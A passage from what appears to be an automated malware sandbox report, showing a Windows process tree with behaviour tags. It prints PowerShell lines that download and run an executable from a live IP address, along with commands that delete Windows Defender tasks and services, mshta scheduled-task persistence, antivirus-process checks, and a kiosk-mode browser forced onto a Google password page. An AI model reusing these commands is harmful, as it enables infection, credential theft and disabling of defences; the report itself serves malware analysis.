                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    9⤵
                                                      PID:2480
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      9⤵
                                                        PID:1432
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        9⤵
                                                          PID:2864
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          9⤵
                                                            PID:1620
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            9⤵
                                                              PID:1424
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              9⤵
                                                              • Launches sc.exe
                                                              PID:2064
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              9⤵
                                                              • Launches sc.exe
                                                              PID:1588
                                                  • C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2096
                                                    • C:\Windows\SysWOW64\CMD.exe
                                                      "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                      5⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:620
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2992
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /I "opssvc wrsa"
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2984
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2788
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2576
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c md 267978
                                                        6⤵
                                                          PID:2724
                                                        • C:\Windows\SysWOW64\extrac32.exe
                                                          extrac32 /Y /E Spanish.vss
                                                          6⤵
                                                            PID:2160
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V "East" Removed
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1424
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1672
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2116
                                                          • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                                            Exam.com j
                                                            6⤵
                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:1056
                                                          • C:\Windows\SysWOW64\choice.exe
                                                            choice /d y /t 5
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2372
                                                      • C:\Users\Admin\AppData\Local\Temp\10339220101\700bad0c24.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339220101\700bad0c24.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:2232
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn VIm8umaidJO /tr "mshta C:\Users\Admin\AppData\Local\Temp\Tb4GaKJMr.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2424
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn VIm8umaidJO /tr "mshta C:\Users\Admin\AppData\Local\Temp\Tb4GaKJMr.hta" /sc minute /mo 25 /ru "Admin" /f
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:324
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta C:\Users\Admin\AppData\Local\Temp\Tb4GaKJMr.hta
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies Internet Explorer settings
                                                          PID:1308
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GW1OWVGT0FZBHJLTYJNBU2JKC9RDSGDI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            6⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Downloads MZ/PE file
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2240
                                                            • C:\Users\Admin\AppData\Local\TempGW1OWVGT0FZBHJLTYJNBU2JKC9RDSGDI.EXE
                                                              "C:\Users\Admin\AppData\Local\TempGW1OWVGT0FZBHJLTYJNBU2JKC9RDSGDI.EXE"
                                                              7⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1948
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10339230121\am_no.cmd" "
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:912
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 2
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Delays execution with timeout.exe
                                                          PID:1544
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2996
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2992
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2776
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2788
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2928
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                            6⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2664
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn "Fq2gnmaRQIs" /tr "mshta \"C:\Temp\OPQ8o0xEu.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2208
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta "C:\Temp\OPQ8o0xEu.hta"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies Internet Explorer settings
                                                          PID:448
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            6⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Downloads MZ/PE file
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1592
                                                            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                              7⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2392
                                                      • C:\Users\Admin\AppData\Local\Temp\10339380101\b6cbb18559.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339380101\b6cbb18559.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:1688
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 1688 -s 64
                                                          5⤵
                                                          • Loads dropped DLL
                                                          PID:1888
                                                      • C:\Users\Admin\AppData\Local\Temp\10339390101\1f0787cd03.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339390101\1f0787cd03.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:852
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 852 -s 36
                                                          5⤵
                                                          • Loads dropped DLL
                                                          PID:1856
                                                      • C:\Users\Admin\AppData\Local\Temp\10339400101\3c37bf00a2.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339400101\3c37bf00a2.exe"
                                                        4⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2464
                                                      • C:\Users\Admin\AppData\Local\Temp\10339410101\078940b471.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339410101\078940b471.exe"
                                                        4⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2108
                                                      • C:\Users\Admin\AppData\Local\Temp\10339420101\7a27703031.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10339420101\7a27703031.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:2764
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM firefox.exe /T
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:912
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM chrome.exe /T
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1884
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM msedge.exe /T
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2380
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM opera.exe /T
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:904
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM brave.exe /T
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2636
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                          5⤵
                                                            PID:1588
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                              6⤵
                                                              • Checks processor information in registry
                                                              • Modifies registry class
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:272
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.0.1913885343\1771437174" -parentBuildID 20221007134813 -prefsHandle 1228 -prefMapHandle 1220 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f3e7028-af2f-4010-aa4d-19ae902b3abd} 272 "\\.\pipe\gecko-crash-server-pipe.272" 1292 122d6358 gpu
                                                                7⤵
                                                                  PID:3064
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.1.1499318146\798348175" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0afaf4b-954b-45e5-904c-f739c347c1aa} 272 "\\.\pipe\gecko-crash-server-pipe.272" 1504 d74b58 socket
                                                                  7⤵
                                                                    PID:2596
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.2.234042495\324518907" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad2dfdaf-b833-4da9-9c47-926a403e8e3c} 272 "\\.\pipe\gecko-crash-server-pipe.272" 2112 1a4c6358 tab
                                                                    7⤵
                                                                      PID:1856
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.3.1810001430\1793520038" -childID 2 -isForBrowser -prefsHandle 2920 -prefMapHandle 2916 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {59cdd2a7-40c8-4940-a3e5-e66e3458e469} 272 "\\.\pipe\gecko-crash-server-pipe.272" 2932 1d4ea258 tab
                                                                      7⤵
                                                                        PID:1572
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.4.759443954\893285724" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3808 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a1cfdae-cbad-4ddb-9638-f2b88c9df1d3} 272 "\\.\pipe\gecko-crash-server-pipe.272" 3824 20ef5e58 tab
                                                                        7⤵
                                                                          PID:2708
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.5.647502773\1624451282" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {988604b0-c0c7-4939-8526-d05611074edf} 272 "\\.\pipe\gecko-crash-server-pipe.272" 3920 215c5b58 tab
                                                                          7⤵
                                                                            PID:2836
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="272.6.74828024\721448041" -childID 5 -isForBrowser -prefsHandle 4088 -prefMapHandle 4092 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {baa4bd99-577a-412b-9c49-ea6b47ac6ed4} 272 "\\.\pipe\gecko-crash-server-pipe.272" 4076 215c4358 tab
                                                                            7⤵
                                                                              PID:2360
                                                                      • C:\Users\Admin\AppData\Local\Temp\10339430101\5654c525a9.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10339430101\5654c525a9.exe"
                                                                        4⤵
                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                        • Modifies Windows Defender TamperProtection settings
                                                                        • Modifies Windows Defender notification settings
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Windows security modification
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1688
                                                                      • C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10339440101\TbV75ZR.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Windows directory
                                                                        PID:1908
                                                                        • C:\Windows\SysWOW64\CMD.exe
                                                                          "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                          5⤵
                                                                          • Loads dropped DLL
                                                                          PID:2304
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist
                                                                            6⤵
                                                                            • Enumerates processes with tasklist
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4008
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /I "opssvc wrsa"
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4016
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist
                                                                            6⤵
                                                                            • Enumerates processes with tasklist
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4092
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                            6⤵
                                                                              PID:2284
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c md 267978
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3108
                                                                            • C:\Windows\SysWOW64\extrac32.exe
                                                                              extrac32 /Y /E Spanish.vss
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3120
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr /V "East" Removed
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3308
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3340
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3424
                                                                            • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                                                              Exam.com j
                                                                              6⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:3472
                                                                            • C:\Windows\SysWOW64\choice.exe
                                                                              choice /d y /t 5
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3536
                                                                        • C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10339450101\f73ae_003.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3688
                                                                        • C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10339460101\7IIl2eE.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Drops file in Windows directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3796
                                                                          • C:\Windows\SysWOW64\CMD.exe
                                                                            "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                            5⤵
                                                                            • Loads dropped DLL
                                                                            PID:3868
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist
                                                                              6⤵
                                                                              • Enumerates processes with tasklist
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3340
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr /I "opssvc wrsa"
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3356
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist
                                                                              6⤵
                                                                              • Enumerates processes with tasklist
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3480
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                              6⤵
                                                                                PID:3484
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c md 418377
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3560
                                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                                extrac32 /Y /E Leon.cab
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2636
                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                findstr /V "BEVERAGES" Compilation
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:308
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2792
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3648
                                                                              • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                Passwords.com N
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:3724
                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                choice /d y /t 5
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3772
                                                                          • C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10339470101\Q1DOy22.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:3892
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd.exe /c 67e3b7493caeb.vbs
                                                                              5⤵
                                                                                PID:3924
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e3b7493caeb.vbs"
                                                                                  6⤵
                                                                                    PID:4060
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
